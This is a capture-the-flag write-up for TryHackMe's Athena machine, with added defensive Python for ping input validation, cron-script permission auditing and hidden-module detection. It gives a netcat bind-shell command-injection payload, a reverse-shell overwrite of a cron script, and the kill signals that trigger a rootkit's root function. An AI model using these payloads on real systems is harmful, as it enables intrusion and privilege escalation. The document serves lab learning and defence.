We covered the boot2root challenge Athena from TryHackMe. We scanned the machine with Nmap and discovered an SMB server from which we extracted a note that pointed us to a directory on the web server where we found a ping tool running. We used command substitution to inject a bind shell and land the first foothold. We discovered a backup script running periodically as another user. We modified the script to execute a reverse shell and opened another session as the user Athena. Upon enumeration, we found that the user Athena can load kernel modules with sudo using insmod without needing the root password. We downloaded the kernel module “venom.ko” and used Ghidra to reverse engineer the binary. We discovered that it is a rootkit, and after code analysis we were able to interact with the module to call a function that escalated privileges from Athena to root.
Initial Enumeration
I started by running an nmap scan to identify open ports on the target machine. I found ports 22 (SSH) and 80 (HTTP) to be open. The HTTP server on port 80 initially showed a simple page with no obvious vulnerabilities, and directory brute-forcing with tools like Gobuster didn’t reveal anything useful.
SMB Enumeration and Discovery
Even though it didn’t initially show up in my nmap scan, I discovered an SMB (Server Message Block) service. I connected to the SMB share anonymously (without a password) using smbclient //<target_IP>/public. Inside the public share, I found a text file. The content of this file was a note about a new “ping system” being developed and provided a path to access it.
Exploiting the Ping Tool (Command Injection)
Accessing the revealed path led me to a simple web-based ping tool. I attempted standard command injection techniques like ; and &&, but they were blocked by filters. I then successfully bypassed these filters using command substitution.
I set up a bind shell using nc (netcat) via command substitution, making the target machine listen on a specific port. The command I injected into the ping tool was similar to: <IP_to_ping> -c1 $(nc -lp 4545 -e /bin/bash). I then connected to this bind shell from my machine using nc <target_IP> 4545, which gave me initial access as the www-data user (the Apache web server user).
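The root cause of this foothold is a ping helper that builds a shell command from user input and only blocklists a couple of separators. The following is an added example, not code from the challenge or the write-up, showing why that filter is insufficient and what the fix looks like: the blocklist-style check beside an allow-list validator that accepts only an IP literal or a plain hostname, and an argv builder that hands the target to ping as a single argument with no shell involved. The function names and the use of Python are assumptions for illustration.

```python
"""Input handling for a web "ping" helper: the weak filter beside a hardened one."""
import ipaddress
import re
import subprocess

# Hostname per RFC 1123 label rules: letters, digits, hyphens, dots, nothing else.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def blocklist_filter(target):
    """The style of check the write-up ran into: rejects ';' and '&&' only.
    Returns True when the input is accepted. Command substitution is not on
    the list, so '$(...)' and backticks pass straight through."""
    return ";" not in target and "&&" not in target


def is_valid_target(target):
    """Allow-list validation: an IPv4/IPv6 literal or a plain hostname, nothing else."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME_RE.match(target))


def build_ping_argv(target, count=1):
    """Build ping's argument vector. Raises ValueError instead of passing bad input on.
    Because the validator never accepts a leading '-', the target cannot be read as a flag."""
    if not is_valid_target(target):
        raise ValueError("target is not an IP address or hostname")
    return ["ping", "-c", str(count), target]


def run_ping(target):
    """Execute ping with a list argv (shell=False): the target is one argument, so
    shell metacharacters are never interpreted, they are at most literal text ping rejects."""
    return subprocess.run(build_ping_argv(target), capture_output=True, text=True, timeout=10)
```

The design point is that separating data from command structure (an argv list) removes the whole class of injection; the allow-list on top of it keeps junk out of ping's own option parser and gives a clean error to log when someone probes the form.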
Privilege Escalation to User “Athena”
To escalate my privileges, I uploaded the pspy64 tool to the target machine to monitor processes and cron jobs. I observed a backup script running at regular intervals by a user with UID 1001, which I identified as the user “Athena.” I found that the www-data user owned this backup script, meaning I could modify it.
My strategy was to replace the script’s content with a reverse shell. When the cron job executed the script as “Athena,” my reverse shell would run, giving me access as “Athena.” I prepared a reverse shell payload and inserted it into the backup script. I started a listener on my machine using nc -lvnp 4547, and when the cron job executed, I successfully obtained a shell as “Athena.”
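The misconfiguration here is a script executed on a schedule as one user (UID 1001) but owned by a different, lower-privileged user (www-data), so whoever controls that account controls what runs as Athena. The following is an added audit check, not code from the challenge, that a defender can run against any cron-driven script: it reports an owner mismatch against the executing UID, group or world write bits, and a world-writable parent directory without the sticky bit. The helper that builds a throwaway sample script exists only so the check can be exercised offline; the function names are assumptions.

```python
"""Flag a cron-run script that a user other than the one executing it can modify."""
import os
import stat
import tempfile


def audit_cron_script(path, run_uid):
    """Return a list of findings for a script cron executes as `run_uid`.
    An empty list means ownership and permission bits are consistent with that
    uid being the only one able to change what runs (file content is not inspected)."""
    findings = []
    st = os.stat(path)
    if st.st_uid != run_uid:
        findings.append("owner uid %d differs from executing uid %d" % (st.st_uid, run_uid))
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    # A writable parent lets anyone unlink and replace the file even if the file itself is locked down.
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        findings.append("parent directory world-writable without sticky bit")
    return findings


def audit_sample(mode, run_as_owner=True):
    """Create a constructed sample script in a private temp dir, chmod it to `mode`,
    and audit it either as its owner or as a different uid. Used for demonstration only."""
    workdir = tempfile.mkdtemp()  # created 0700, so no parent-directory finding
    path = os.path.join(workdir, "backup.sh")
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\ntar czf /tmp/backup.tgz /var/www 2>/dev/null\n")
    os.chmod(path, mode)
    run_uid = os.getuid() if run_as_owner else os.getuid() + 1
    return audit_cron_script(path, run_uid)


if __name__ == "__main__":
    print("0755, run as owner:   ", audit_sample(0o755))
    print("0666, run as owner:   ", audit_sample(0o666))
    print("0755, run as other uid:", audit_sample(0o755, run_as_owner=False))
```

Pointing audit_cron_script at a real entry means reading the crontab (or /etc/cron.d) for the command path and the user it runs as; the fix on the box side is the usual one of making the executing user, or root, own the script and its directory with no group or world write bits.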
Privilege Escalation to Root (Rootkit Analysis)
As “Athena,” I ran sudo -l to check my sudo privileges. This revealed that I could execute the insmod command as root without a password, specifically to load a kernel module named venom.ko.
I downloaded the venom.ko module to my attacker machine and analyzed it using Ghidra. My analysis revealed that venom.ko was a rootkit called “Diamorphine.” Rootkits are designed to hide their presence. The Diamorphine documentation showed that sending signal 63 to the rootkit would make it visible. Further analysis of the rootkit’s code in Ghidra (specifically the hacked_kill function) showed that if a variable was set to a specific hex value (decimal 57), a give_root function would be called.
I first loaded the module using sudo /sbin/insmod /home/athena/venom.ko. Then, I used lsmod | grep venom to confirm the module was initially hidden. Sending signal 63 (e.g., kill -63 0) made the rootkit visible in lsmod. Finally, sending signal 57 (e.g., kill -57 0) triggered the give_root function. Typing id confirmed that I now had root privileges!
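The module was "hidden" in the sense that lsmod, which reads /proc/modules, no longer listed it. Stock Diamorphine achieves that by unlinking itself from the kernel's module list, and I am assuming venom.ko behaves the same way; the module's sysfs entry under /sys/module survives, which gives a simple cross-check. The following is an added detection example, not code from the challenge or from Diamorphine: it compares the names in /proc/modules against the /sys/module directories that carry an initstate file (built-in kernel code has a sysfs entry too, but no initstate, so that filter keeps only loadable modules). A constructed fake tree stands in for the real paths so it runs offline; the function names are assumptions. A rootkit that also deletes its sysfs kobject would not be caught by this check alone.

```python
"""Cross-check /proc/modules (what lsmod prints) against /sys/module to spot unlinked modules."""
import os
import tempfile


def parse_proc_modules(text):
    """Module names from /proc/modules content: the first whitespace-separated field per line."""
    return {line.split()[0] for line in text.splitlines() if line.strip()}


def loadable_sys_modules(sys_module_root):
    """Directories under /sys/module that have an 'initstate' file, i.e. modules that were loaded."""
    names = set()
    for name in os.listdir(sys_module_root):
        if os.path.isfile(os.path.join(sys_module_root, name, "initstate")):
            names.add(name)
    return names


def hidden_modules(proc_names, sys_names):
    """Loaded modules that sysfs knows about but the module list no longer reports."""
    return sorted(sys_names - proc_names)


def check_live():
    """Run the comparison against the real kernel interfaces (Linux only)."""
    with open("/proc/modules") as fh:
        proc_names = parse_proc_modules(fh.read())
    return hidden_modules(proc_names, loadable_sys_modules("/sys/module"))


# Constructed sample data: /proc/modules lists only ext4 (the cut-down line format is real;
# the addresses and counts are made up), while sysfs still has an entry for a loaded 'venom'.
SAMPLE_PROC_MODULES = (
    "ext4 737280 1 - Live 0x0000000000000000\n"
    "mbcache 16384 1 ext4, Live 0x0000000000000000\n"
)


def build_sample_tree(root, loaded, builtin):
    """Create a fake /sys/module layout: loaded modules get an initstate file, built-ins do not."""
    for name in loaded:
        os.makedirs(os.path.join(root, name))
        with open(os.path.join(root, name, "initstate"), "w") as fh:
            fh.write("live\n")
    for name in builtin:
        os.makedirs(os.path.join(root, name))


def demo():
    """Build the sample tree in a temp dir and return the modules flagged as hidden."""
    root = tempfile.mkdtemp()
    build_sample_tree(root, loaded=["ext4", "mbcache", "venom"], builtin=["vt", "tcp_cubic"])
    return hidden_modules(parse_proc_modules(SAMPLE_PROC_MODULES), loadable_sys_modules(root))


if __name__ == "__main__":
    print("hidden in sample:", demo())
```

From a hardening standpoint the sudoers entry is the real finding: a rule that lets a user run insmod (on any module path, or on a file in that user's own home directory) is equivalent to granting root, and that line in sudo -l output is what an audit should flag before any rootkit analysis is needed.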
Technical Commands Used:
nmap -Pn -A <target_IP>
smbclient //<target_IP>/public
ls (within smbclient)
get <filename> (within smbclient)
cat <filename>
<IP_to_ping> -c1 $(nc -lp 4545 -e /bin/bash) (command injection for bind shell)
nc <target_IP> 4545
id
cat /etc/passwd
ls -la /usr/share/backup
cat /usr/share/backup/backup.sh
rm /usr/share/backup/backup.sh
echo '<reverse_shell_payload>' > /usr/share/backup/backup.sh
chmod +x /usr/share/backup/backup.sh
nc -lvnp 4547
sudo -l
sudo /sbin/insmod /home/athena/venom.ko
lsmod | grep venom
kill -63 <PID_of_rootkit_or_0>
kill -57 <PID_of_rootkit_or_0>